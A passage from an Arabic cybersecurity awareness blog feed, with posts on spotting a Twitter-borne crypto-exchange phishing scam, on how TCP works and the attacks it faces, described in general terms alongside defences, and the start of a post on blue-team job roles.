إذ يتم إعلامك برسالة جديدة على Twitter تحوي على رابط لمنصة خاصة بتبادل العملات المشفرة مع معلومات تسجيل دخول لحساب في هذه المنصة وبعد أن تذهب فعلياً إلى الموقع
تظهر العلامات الحمراء واحدة تلو الأخرى:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;التصميم بسيط وسريع ولا يؤدي البحث عن اسم الدومين في غوغل إلا إلى نتائج ومن المؤكد أن منصات أو مواقع تبادل العملات المشفرة الحقيقية حتى غير المعروفة سيكون لها بعض المراجعات في وسائل الإعلام أو في المنتديات.
كل هذه الأمور تشير إلى أن هذا الموقع هو موقع مزور وذلك حتى قبل أن نصل إلى العلامة الحمراء القاتلة والتي تكشف جوهر عملية الاحتيال بالكامل&lt;/p&gt;
&lt;h2 id=&quot;الدفع-لسحب-العملة-المشفرة&quot;&gt;الدفع لسحب العملة المشفرة&lt;/h2&gt;
&lt;p&gt;اتضح أنه لسحب الأموال خارج المنصة يلزم إدخال كلمة سر أخرى أو ما يسمى بالمفتاح التجاري والذي لم يعطى لنا ولكن من الممكن أن يتم تحويل الأموال داخل المنصة نفسها و من أجل ذلك تحتاج إلى إنشاء حساب جديد VIP ومن ثم تعبئته بأموال آدم. وبعد القيام بذلك سنتمكن من سحب الأموال دون أي عوائق، أليس كذلك؟&lt;/p&gt;
&lt;p&gt;الموقع نفسه &lt;strong&gt;“منصة العملات المشفرة”&lt;/strong&gt; هو مجرد موقع للتصيد الاحتيالي، مع الانتشار الكبير للعملات المشفرة في الفترة الأخيرة أنشأ المحتالون العديد من هذه المواقع وأرسلوا تفاصيل تسجيل الدخول إلى حسابات Twitter مختلفة.&lt;/p&gt;
&lt;h2 id=&quot;بالنسبة-إلى-منصة-العملات-المشفرة-هناك-علامتان-مشبوهتان&quot;&gt;بالنسبة إلى “منصة العملات المشفرة” هناك علامتان مشبوهتان&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;أولاً: لا يتم إرسال العملة المشفرة أبداً من خلال طريقة give-us-your-wallet-details وبدلاً من ذلك تتلقى عنوان دفع لإرسال المبلغ المطلوب إليه من واجهة محفظتك.&lt;/li&gt;
&lt;li&gt;ثانياً لن تطلب منك أي منصة مالية جديرة بالثقة استخدام أموال الجهات الخارجية للتعامل مع الأموال الموجودة بالفعل لديها، ممكن أن يتم فرض رسوم للتحويل ولكن طلب الدفع باستخدام بطاقة مختلفة لسحب الأموال من بطاقة أخرى، هذا غريب بصراحة ولم نذكر حتى اللغة الإنجليزية السيئة والتصميم الغير احترافي والتي تعتبر من السمات المميزة الدائمة لمواقع التصيد الاحتيالي.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيفية-تجنب-هجمات-التصيد-الاحتيالي&quot;&gt;كيفية تجنب هجمات التصيد الاحتيالي&lt;/h2&gt;
&lt;p&gt;حتى لا تقع ضحية لمثل هذا النوع من الهجمات عليك أن تفهم كيف يعمل المحتالون وتكون قادر على اكتشاف جميع التناقضات وتتحقق من هذا الأمر مثل ما فعلنا نحن وحددنا جميع العلامات الحمراء المذكورة أعلاه.&lt;/p&gt;
&lt;h3 id=&quot;بعض-الأسئلة-التي-يجب-أن-تطرحها-على-نفسك-عند-مواجهة-أي-عرض-مثير-مثل-العرض-السابق&quot;&gt;بعض الأسئلة التي يجب أن تطرحها على نفسك عند مواجهة أي عرض مثير مثل العرض السابق&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;هل يمكن أن يكون روبوت bot؟ أليس غريباً أنه لم يرد على الإجابة المرسلة له؟&lt;/li&gt;
&lt;li&gt;هل تبدو الرسالة مريبة ؟ (على سبيل المثال ، في اسم الدومين المذكور يوجد فراغ لخداع الفلاتر الخاصة بفحص أسماء الدومينات)&lt;/li&gt;
&lt;li&gt;ما نوع الموقع الذي يُطلب مني زيارته؟
ماذا يقول الناس عنه على الإنترنت؟ ابحث في الغوغل عن اسم الموقع واسم الدومين وشاهد وتحقق من نتائج البحث، هل يوجد نتائج؟ هل تحوي على مراجعات للمستخدمين؟&lt;/li&gt;
&lt;li&gt;هل التصميم والواجهة يلهمان الثقة (بالتأكيد ، نصف مواقع الويب لا تفعل ذلك لكنك لا تستخدمها لإرسال الأموال)&lt;/li&gt;
&lt;li&gt;هل يبدو منطقياً أن يُطلب منك القيام بهذا الأمر؟ هل من الطبيعي أن تضطر إلى الدفع باستخدام أموال من جهة خارجية لإجراء معاملات بأموال موجودة بالفعل على المنصة؟&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;تأكد-من-كل-هذه-الأمور-وفكر-بالمزيد-من-الشك-ولا-تتسرع-وتنخدع-بمثل-هذه-الطرق-والحيل-المخادعة&quot;&gt;تأكد من كل هذه الأمور وفكر بالمزيد من الشك ولا تتسرع وتنخدع بمثل هذه الطرق والحيل المخادعة&lt;/h3&gt;
&lt;p&gt;من خلال أخذ نفس عميق والإجابة على الأسئلة السابقة ستفهم بشكل أفضل ما يجري ولن تفقد حذرك بسبب فكرة المال السهل الذي يبدو قريباً جداً!&lt;/p&gt;
&lt;p&gt;تشير كثرة العلامات الحمراء في هذه الحالة بوضوح إلى أنك تتعامل مع محتالين، ولكن علامة حمراء واحدة فقط يجب أن تكون كافية لتنبيهك حتى لو لم تأتي هذه الرسالة من مستخدم عشوائي، وكانت قادمة من صديق حقيقي وموثوق بالنسبة لك، فلا يزال يتعين عليك توخي الحذر، من يدري ربما تم اختراق حساب صديقك وتم استخدامه من قبل المهاجمين للقيام بهذا الأمر&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;صفحة ترقية VIP على المنصة المزيفة تعرض خمسة مستويات بمبالغ إيداع من 50 إلى 50000 USDT وتطلب إدخال مفتاح التداول&quot; width=&quot;1600&quot; height=&quot;1013&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-04.BKs1LZL1_PaFVw.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;للحصول على حساب VIP تحتاج إلى إيداع بعض الأموال في الحساب الجديد عن طريق إعطاء تفاصيل محفظة العملة المشفرة الخاصة بك&lt;/p&gt;
&lt;p&gt;لكن عند القيام بذلك لن يكون هناك أي شيء يمكنك سحبه بعد ذلك لأنه سيتم إفراغ محفظتك الخاصة باستخدام بيانات الاعتماد التي تفضلت بتقديمها&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;قد تبدو هذه العلامات الحمراء أمور بديهية للعديد من الأشخاص المختصين أو ذوي الخبرة في هذا المجال&lt;/p&gt;
&lt;p&gt;ولكن بالنسبة للمستخدم العادي فمن المؤكد أنه سيقع ضحية لمثل هذا النوع من الهجمات وسيتمكن المهاجم من خداعه وسرقة أمواله ولهذا السبب فإن &lt;strong&gt;الأمن السيبراني هو حاجة وضرورة وليس رفاهية&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;يجب عليك تعلم أساسيات الأمن السيبراني على الأقل لتتمكن من اكتشاف طرق وأساليب الخداع وتفهم طريقة المهاجمين ومجرمي الانترنت وتكون قادراً على التمييز بين الرسائل الشرعية والرسائل المخادعة وتكون أيضاً قادراً على التمييز بين الروابط والمواقع الشرعية والمواقع المخادعة.&lt;/p&gt;
&lt;p&gt;من خلال مدونتنا يمكنك الاطلاع على العديد من المقالات التي تشرح أساسيات الأمن السيبراني وطرق الحماية مع شرح لطرق الهجوم بلغة بسيطة ومفهومة للمستخدم العادي.
وبالتأكيد يجب أن تتبع النصائح التي نقدمها لك وتتخذ إجراءات الحماية المطلوبة لتكون على الجانب الآمن ضمن شبكة الانترنت.&lt;/p&gt;
&lt;p&gt;للمزيد من نصائح الحماية انصحك بقراءة “&lt;a href=&quot;https://books.cyberpedia.site/product/security-guide/&quot;&gt;دليل الحماية الشامل&lt;/a&gt;“&lt;/p&gt;
</content:encoded><category>العملات الرقمية</category><category>العملات المشفرة</category><category>الاحتيال</category><category>التصيد الاحتيالي</category><category>العلامات الحمراء</category><category>تويتر</category></item><item><title>ماذا تعرف عن بروتوكول التحكم بالنقل TCP؟</title><link>https://blog.cyberpedia.site/tcp/</link><guid isPermaLink="true">https://blog.cyberpedia.site/tcp/</guid><description>شرح مبسط لبروتوكول TCP: كيف ينشئ الاتصال بالمصافحة الثلاثية وينقل البيانات بموثوقية، ولماذا ليس آمناً بطبيعته، وأشهر هجماته وطرق الحماية منها.</description><pubDate>Mon, 15 Jul 2024 10:02:21 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;بروتوكول التحكم بالنقل TCP أساس نموذج TCP/IP، ينشئ اتصالاً بين العميل والسيرفر بالمصافحة الثلاثية (SYN، SYN-ACK، ACK) ثم يقسم البيانات ويؤكد استلامها ويعيد ترتيبها. لا يوفر تشفيراً أو مصادقة، لذا يُستخدم معه TLS أو SSL، ومن أشهر هجماته SYN Flood وسرقة الجلسة والتنبؤ بالرقم التسلسلي.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;هل تساءلت يوماً عن شكل الرحلة التي تقطعها رسالتك الإلكترونية عبر شبكة الإنترنت لكي تصل بسرعة فائقة ودقة تامة إلى أصدقائك في الطرف الآخر من العالم، متخطيةً جميع الحواجز الجوية والمسافات البعيدة؟!
إذا كانت الإجابة لديك لا تزال تختبىء في زوايا الغموض، فهذا المقال لك.&lt;/p&gt;
&lt;p&gt;سنتعرف في هذا المقال على العمود الفقري والبطل الخفي وراء عالم شبكات الإنترنت والذي يلعب دوراً مهماً وفعالاً في توصيل رسائلنا اليومية بكفاءة ودقة وموثوقية تامة.&lt;/p&gt;
&lt;p&gt;نعم! إنه بروتوكول التحكم بالنقل TCP!&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-tcp&quot;&gt;ما هو TCP؟&lt;/h2&gt;
&lt;p&gt;بدايةً يشير اختصار TCP إلى Transmission Control Protocol أي بروتوكول التحكم بالنقل أو الإرسال، يشكّل هذا البروتوكول حجر الأساس لنموذج الاتصال عبر الشبكة الشهير TCP/IP ، فهو يتحكم في كيفية نقل البيانات بين نظامين: العميل والسيرفر ويتأكد من تحقيق ذلك بنجاح وهو أيضاً من البروتوكولات التي تعتمد على ما يسمى بالاتصال الموجّه (القيام بتأسيس عملية الاتصال بين الجهازين ومن ثم البدء بإرسال البيانات عبر الشبكة) تم تطوير هذا البروتوكول في السبعينيات من قبل Vint Cerf and Bob Kahn وأصبح جزءاً أساسياً من الاتصال عبر الإنترنت منذ ذلك الحين إلى يومنا هذا.&lt;/p&gt;
&lt;h2 id=&quot;كيف-يعمل-tcp&quot;&gt;كيف يعمل TCP؟&lt;/h2&gt;
&lt;p&gt;لقد تعرفنا للتو على صديقنا الجديد TCP والذي يحظى بمكانة رفيعة في عالم الشبكات والآن لنقم بجولة سريعة لاستكشاف كيفية عمله بدقة ومهارة&lt;/p&gt;
&lt;p&gt;مرحبا! أنا بروتوكول التحكم بالنقل TCP ، مهمتي الأساسية هي ضمان نقل البيانات بطريقة موثوقة وخالية من الأخطاء عبر الشبكات المتنوعة، دعوني أشرح لكم مراحل عملي :&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;المصافحة الثلاثية في بروتوكول TCP: يرسل العميل SYN ويرد السيرفر بـ SYN-ACK ثم يرسل العميل ACK&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.Bc1CIs3e_1Q2Qbb.webp&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إنشاء الاتصال&lt;/strong&gt;: قبل أن أقوم بنقل أي بيانات يجب إنشاء اتصال TCP باسمي بين الجهازين ويتم تحقيق ذلك من خلال عملية تسمى المصافحة الثلاثية بين الأجهزة (SYN, SYN-ACK, ACK).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تقسيم البيانات&lt;/strong&gt;: أقوم بتقسيم البيانات المُراد إرسالها إلى Packets صغيرة لتسهيل عملية الإرسال.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إعادة التجميع&lt;/strong&gt;: عند وصول الحزم إلى الطرف المستقبل أعيد تجميعها لضمان وصول البيانات بشكل كامل وصحيح.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التحكم بالإرسال&lt;/strong&gt;: أتحكم في إرسال البيانات وأضمن وصول جميع الحزم دون فقدان.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التأكيدات&lt;/strong&gt;: أرسل ACK للتأكد من استلام الحزم وفي حالة عدم الاستلام أعيد إرسال الحزمة المفقودة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إعادة الترتيب&lt;/strong&gt;: أقوم بإعادة ترتيب الحزم التي قد تصل بترتيب غير صحيح لضمان استعادة البيانات الأصلية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إنهاء الاتصال&lt;/strong&gt;: عندما أقوم بنقل كافة البيانات يتم إنهاء اتصال TCP من خلال عملية مصافحة أخرى.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;هل عرفتم الآن سبب تسميتي ببروتوكول الموثوقية المطلقة؟ !&lt;/p&gt;
&lt;h2 id=&quot;هل-tcp-آمن&quot;&gt;هل TCP آمن؟&lt;/h2&gt;
&lt;p&gt;نحن نعلم أن بروتوكول TCP يوفر طريقة موثوقة وفعالة لنقل البيانات، إلا أنه لا يوفر أي آليات تشفير أو مصادقة لتأمين هذه البيانات مما يعني أن حزم البيانات المرسلة عبر TCP ليست آمنة بطبيعتها ويمكن اعتراضها أو سرقتها إذا تعرضت الشبكة للاختراق.&lt;/p&gt;
&lt;p&gt;ولهذا السبب ولتعزيز الحماية عبر اتصالات TCP ، غالباً ما يتم استخدام بروتوكولات إضافية مثل TLS (Transport Layer Security) أو SSL (Secure Sockets Layer) ، توفر هذه البروتوكولات تشفيراً للبيانات التي يتم إرسالها، مما يضمن أنه حتى في حالة اعتراض حزم البيانات فإنه لا يمكن قراءتها أو التلاعب بها بسهولة، من المهم ملاحظة أنه على الرغم من إمكانية جعل TCP آمناً من خلال هذه التدابير الإضافية إلا أن البروتوكول نفسه لا يضمن الحماية ضد جميع أنواع التهديدات السيبرانية!.&lt;/p&gt;
&lt;h2 id=&quot;هجمات-tcp-الأكثر-شيوعاً&quot;&gt;هجمات TCP الأكثر شيوعاً&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;في عالم الأمن السيبراني، يوجد اعتقاد ثابت وهو&lt;/p&gt;
&lt;p&gt;كل شيء متصل عبر شبكة الانترنت معرض للهجوم والاختراق ومبدأ الحماية المطلقة ضد الهجمات مرفوض تماماً!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;وبالتالي لا يمكننا التهرب من الحديث عن أكثر الهجمات شيوعاً والتي تعرض لها بروتوكول TCP :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SYN Flood Attack&lt;/strong&gt; : نوع من هجمات منع الخدمة (DoS) والذي يستغل عملية المصافحة الثلاثية التي يستخدمها TCP لإنشاء الاتصال، حيث يرسل المهاجم عدداً كبيراً من طلبات SYN إلى السيرفر الهدف مما يفوق قدرته على معالجتها ويتسبب في خروجه عن الخدمة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TCP Session Hijacking&lt;/strong&gt; : هجوم سرقة جلسة الاتصال عبر TCP ، حيث يقوم المهاجم باعتراض جلسة TCP موجودة والاستيلاء عليها ويمكنه بعدها التنصت على الاتصالات أو إدخال بيانات خاطئة في الجلسة أو تعطيل الجلسة تماماً، هذا النوع من الهجوم وارد جداً نظراً لأن المصادقة يتم إجراؤها فقط في بداية جلسة TCP، يوجد أيضاً هجوم رجل في المنتصف &lt;strong&gt;man-in-the-middle&lt;/strong&gt; وهو نوع آخر من هجوم سرقة الجلسة، حيث يمكن للمهاجم ومن خلال استخدام أدوات معينة مراقبة الاتصال بين الأجهزة والاطلاع على البيانات المنقولة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TCP Sequence Prediction&lt;/strong&gt; : في هذا الهجوم يحاول المهاجم التنبؤ بالرقم التسلسلي الذي يستخدمه TCP لإنشاء الاتصال ويمكن للمهاجم بعد ذلك استخدام هذه المعلومات لإدخال بيانات خاطئة في الاتصال أو تعطيل الاتصال أو سرقة معلومات حساسة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيفية-منع-هجمات-tcp&quot;&gt;كيفية منع هجمات TCP؟&lt;/h2&gt;
&lt;p&gt;كما قلنا سابقاً، لا يوجد حماية مطلقة ولكن نحن نقوم بتوخي الحيطة والحذر للتقليل قدر الإمكان من الأضرار الناجمة عن أي هجوم وذلك من خلال بعض الإجراءات:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;استخدام طرق تشفير قوية&lt;/strong&gt;: يعد تشفير البيانات التي يتم إرسالها عبر بروتوكول TCP أحد أفضل الطرق لمنع التنصت والتلاعب بالبيانات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;استخدام جدران الحماية&lt;/strong&gt;: يمكن استخدام جدران الحماية لتقييد حركة البيانات الواردة والصادرة من وإلى الشبكة، مما يقلل من مخاطر الاستغلال.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;مراقبة نشاط الشبكة&lt;/strong&gt;: من خلال مراقبة حركة البيانات عبر الشبكة، من الممكن اكتشاف النشاط المشبوه واتخاذ الإجراء الفوري والمناسب، كما يمكن استخدام أدوات المراقبة مثل أنظمة كشف الاختراق (IDS) لتحديد التهديدات المحتملة واتخاذ الإجراءات اللازمة للتخفيف منها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المحافظة على تحديث الأنظمة&lt;/strong&gt;: يساعد تحديث الأنظمة بانتظام في سد أي ثغرات أمنية قد تكون موجودة، يعد تحديث الأنظمة بأحدث الإصلاحات الأمنية جزءاً مهماً من منع الهجمات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تطبيق آليات للمصادقة وتحديد الصلاحيات:&lt;/strong&gt; يمكن أن يساعد تطبيق آليات المصادقة وتحديد مستوى الصلاحيات، مثل كلمات المرور وعناصر التحكم في الوصول في منع الوصول غير المصرح به إلى موارد الشبكة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إجراء تقييمات أمنية منتظمة&lt;/strong&gt;: تساعد التقييمات الأمنية المنتظمة في تحديد نقاط الضعف الأمنية المحتملة في الشبكة ومعالجتها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;توعية وتدريب المستخدمين&lt;/strong&gt;: هناك مقولة شائعة في عالم الأمن السيبراني “إن أضعف عنصر في أي نظام هو العنصر البشري” لذلك لا يجب الاستخفاف بهذا البند أبداً، بل يجب على الشركات الحرص على نشر الوعي وتثقيف الموظفين بشكل دوري حول ممارسات الحوسبة الآمنة، مثل تجنب عمليات التصيد الاحتيالي واستخدام كلمات مرور قوية لتقليل المخاطر المحتملة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;في-نهاية-رحلتنا-مع-بروتوكول-tcp&quot;&gt;في نهاية رحلتنا مع بروتوكول TCP&lt;/h2&gt;
&lt;p&gt;نجد أنفسنا أمام تقنية عظيمة تعمل بصمت وكفاءة لتوصيل أفكارنا ورسائلنا عبر الأثير الرقمي متخطيةً الحدود والمسافات، لقد تعلمنا أن TCP هو البطل غير المرئي الذي يضمن وصول كل كلمة وكل معلومة محافظاً على سلامة البيانات وتسلسلها وموفراً لنا الثقة في عالم الاتصالات الذي لا ينام.&lt;/p&gt;
&lt;p&gt;مع ذلك، لا يخلو الأمر من التحديات والمخاطر فالأمان الرقمي لا يزال يتطلب يقظة دائمة وتحديثاً مستمراً .&lt;/p&gt;
&lt;p&gt;ما يتوجب علينا نحن أن نتذكر دورنا كمستخدمين في الحفاظ على أمان شبكاتنا فالوعي والمعرفة هما خط الدفاع الأول ضد التهديدات السيبرانية فلنتحمل جميعاً المسؤولية في تعزيز أمان بياناتنا وخصوصيتنا لنتمكن من البقاء متصلين بأمان في هذا العالم الرقمي الواسع!.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>TCP</category><category>بروتوكولات الشبكات</category><category>المصافحة الثلاثية</category><category>SYN Flood</category><category>TCP/IP</category></item><item><title>مجالات عمل الأمن السيبراني – الفريق الأزرق</title><link>https://blog.cyberpedia.site/cybersecurity-job-roles-blue-team/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cybersecurity-job-roles-blue-team/</guid><description>تعرّف على أبرز تخصصات الفريق الأزرق في الأمن السيبراني: مهندس الحماية ومحلل مركز العمليات وتحليل البرمجيات الخبيثة والتحليل الجنائي واستخبارات التهديد.</description><pubDate>Fri, 03 May 2024 11:11:09 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يضم الفريق الأزرق في الأمن السيبراني ثمانية تخصصات دفاعية: مهندس الحماية، محلل مركز العمليات SOC، تحليل البرمجيات الخبيثة، التحليل الجنائي الرقمي، إدارة الهوية والوصول، الاستجابة للحوادث، اصطياد التهديدات، واستخبارات التهديد. وغالباً ما يكون بوابة الدخول الأولى لمهنة الأمن السيبراني.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;ما هو شائع عموماً بأن &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; هو اختصاص واحد فقط، وهذه المعلومة خاطئة للغاية. لأن مجال الأمن السيبراني هو مجال واسع جداً، وتندرج تحته العديد والعديد من التخصصات الفرعية لحماية الأنظمة والمعلومات المتبادلة عبرها.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;في عالمنا الرقمي المتصل&lt;/p&gt;
&lt;p&gt;كل شيء متصل بشبكة الانترنت هو عرضة للاختراق ويحتاج إلى الحماية&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;في هذه السلسلة من المقالات سنقدم لكم لمحة عامة عن أغلب مجالات عمل الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;إن كنت مبتدئاً في هذا المجال وترغب في الاطلاع على مجالات عمل الأمن السيبراني، أو إن كنت مختصاً بالفعل في هذا المجال وتسعى لتغيير لون قبعتك، فهذا المقال هو لك.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;اقرأه بعناية!&lt;/strong&gt;
قد تجد تشابهاً كبيراً في مجالات عمل الأمن السيبراني. إلا أنه هناك فروقات بين كل تخصص والآخر، وكل الشركات الكبيرة تعتمد تخصصات معينة ومحددة للأدوار. يجب أن تعلم أن جميع مجالان عمل الأمن السيبراني تندرج تحت ثلاث عناوين رئيسية، وهي: الفريق الأزرق والفريق الأحمر وتخصصات GRC.&lt;/p&gt;
&lt;h2 id=&quot;الفريق-الأزرق&quot;&gt;الفريق الأزرق&lt;/h2&gt;
&lt;p&gt;الفريق الأزرق أو ما يطلق عليه عالمياً بمصطلح &lt;strong&gt;Blue Team&lt;/strong&gt; هو خط الدفاع الأول ضد الهجمات الإلكترونية. وهو عبارة عن مجموعة الأشخاص المسؤولين عن حماية البرامج والأنظمة والشبكات من الاختراقات والهجمات السيبرانية.&lt;/p&gt;
&lt;h2 id=&quot;تخصصات-الفريق-الأزرق&quot;&gt;تخصصات الفريق الأزرق&lt;/h2&gt;
&lt;h3 id=&quot;1مهندس-الحماية-security-engineer&quot;&gt;1.مهندس الحماية Security Engineer&lt;/h3&gt;
&lt;p&gt;المهمة الأساسية لمهندس الحماية هي إعداد وتشغيل أنظمة وحلول الحماية الخاصة بالشركة. قد يتضمن ذلك تنفيذ واختبار ميزات جديدة والتخطيط لترقية الأنظمة واستكشاف الأخطاء وإصلاحها والاستجابة للحوادث الأمنية. قد يطلق على مهندسي الحماية أيضاً اسم مهندسي الأمن السيبراني أو مهندسي أمن نظم المعلومات أو مهندسي أمن المعلومات أو مهندسي أمن الشبكات.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إعداد وتصميم وتشغيل الحلول الأمنية:&lt;/strong&gt; للتخفيف من المخاطر والتهديدات الأمنية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تقييم المخاطر:&lt;/strong&gt; تحديد التهديدات والمخاطر المحتملة على الأنظمة والشبكات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الصيانة:&lt;/strong&gt; مراقبة الضوابط الأمنية وتحديثها وصيانتها باستمرار.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التوعية والتدريب:&lt;/strong&gt; توعية وتدريب الموظفين على المخاطر الأمنية وإرشادهم للامتثال بالضوابط الأمنية.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;2محلل-مركز-عمليات-الأمن-السيبراني-soc-analyst&quot;&gt;2.محلل مركز عمليات الأمن السيبراني SOC Analyst&lt;/h3&gt;
&lt;p&gt;يعتبر هذا التخصص من التخصصات المشهورة والأكثر طلباً في مجالات عمل الأمن السيبراني. يتكون من فريق كامل من المتخصصين العاملين في مركز عمليات الأمن السيبراني SOC – Security Operations Center، موزعين حسب الخبرة إلى ثلاثة مستويات: المستوى الأول Tier 1 والمستوى الثاني Tier 2 والمستوى الثالث Tier 3. حيث يعتبر المستوى الأول أقل خبرة والمستوى الثالث أعلى خبرة. يعمل الفريق بأكمله على مراقبة وإدارة الأحداث والعمليات الأمنية لمؤسسة معينة ويُعد جزءاً أساسياً من البنية التحتية الأمنية للمؤسسة، حيث يسهم في تحليل ومراقبة الأنظمة والشبكات والبيانات المتبادلة عبرها، بالإضافة إلى مراقبة التنبيهات الأمنية والاستجابة للحوادث الأمنية والتصدي للهجمات والتهديدات المحتملة وحماية الأصول الرقمية والمعلومات الحساسة للشركة أو المؤسسة.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-1&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;مراقبة وتحليل التنبيهات الأمنية الواردة:&lt;/strong&gt; يقوم المختص في هذا المجال بمراقبة سجلات الأحداث والتنبيهات التي تصدر عن أنظمة كشف ومنع الاختراق IDS/IPS، بالإضافة إلى التعامل مع نظام إدارة الأحداث الأمنية (SIEM) وغيرها من أدوات وحلول الحماية الأخرى.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;فرز وتصنيف التهديدات:&lt;/strong&gt; تحديد أولوية التنبيهات وتصنيفها بناءً على خطورتها ومدى احتمالية أن تكون هجوم حقيقي.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الاستجابة للحوادث الأمنية:&lt;/strong&gt; بعد أن يقوم محللو المستوى الأول بتحديد التنبيهات المرتبطة بحوادث أو تهديدات أمنية حقيقية، يعمل محللو المستوى الثاني على الاستجابة لهذه الحوادث وتقليل الضرر المرتبط بها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;اكتشاف واصطياد التهديدات Threat Hunting:&lt;/strong&gt; يقوم بهذه المهمة محللو المستوى الثالث من خلال البحث عن التهديدات التي تمكنت من الوصول للبنية التحتية للشبكة أو النظام بدون أن يتم اكتشافها من قبل أنظمة الحماية المطبقة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;3محلل-البرمجيات-الخبيثة-malware-analysis&quot;&gt;3.محلل البرمجيات الخبيثة Malware Analysis&lt;/h3&gt;
&lt;p&gt;يندرج هذا المسمى تحت تخصاصات الأمن السيبراني الهامة. يعمل محلل البرمجيات الخبيثة على تحليل ودراسة سلوك البرامج الضارة والخبيثة التي صُممت للقيام بعمليات اختراق الأنظمة وسرقة المعلومات الحساسة أو تشفيرها أو التلاعب بها. تأتي أهمية هذا التخصص لتزويد شركات الحماية بالتوقيعات الرقمية أو أنماط السلوك المشبوهة للبرمجيات الخبيثة ليتم اكتشافها ومنعها بشكل فعال.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-2&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;تحليل البرمجيات الخبيثة:&lt;/strong&gt; تحديد نوع البرمجية الخبيثة وطريقة عملها وكيفية انتشارها عبر الأنظمة والشبكات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تقييم التهديد:&lt;/strong&gt; معرفة مدى خطورة البرمجيات الخبيثة وما الطرق الفعالة للحد منها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحليل الثغرات الأمنية:&lt;/strong&gt; اكتشاف الثغرات التي تم استغلاها من قبل هذه البرمجيات الخبيثة والعمل على إصلاحها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تطوير الحلول والأدوات:&lt;/strong&gt; العمل على بناء الأدوات وحلول الحماية القادرة على اكتشاف ومنع انتشار البرمجيات الخبيثة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;كتابة التقارير:&lt;/strong&gt; كتابة التقارير الدورية المفصلة عن التحليلات والتهديدات وطرق معالجتها.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;4التحليل-الجنائي-الرقمي-digital-forensics&quot;&gt;4.التحليل الجنائي الرقمي Digital Forensics&lt;/h3&gt;
&lt;p&gt;المهمة الرئيسية لمختصي التحليل الجنائي الرقمي هي جمع المعلومات والتحقيق في عمليات الاختراق
السيبرانية أو الأنشطة غير القانونية. تجد هذا التخصص بشكل كبير في المراكز الأمنية أو في الشركات
للتحقيق في الجرائم الإلكترونية و الانتهاكات الأمنية.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-3&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
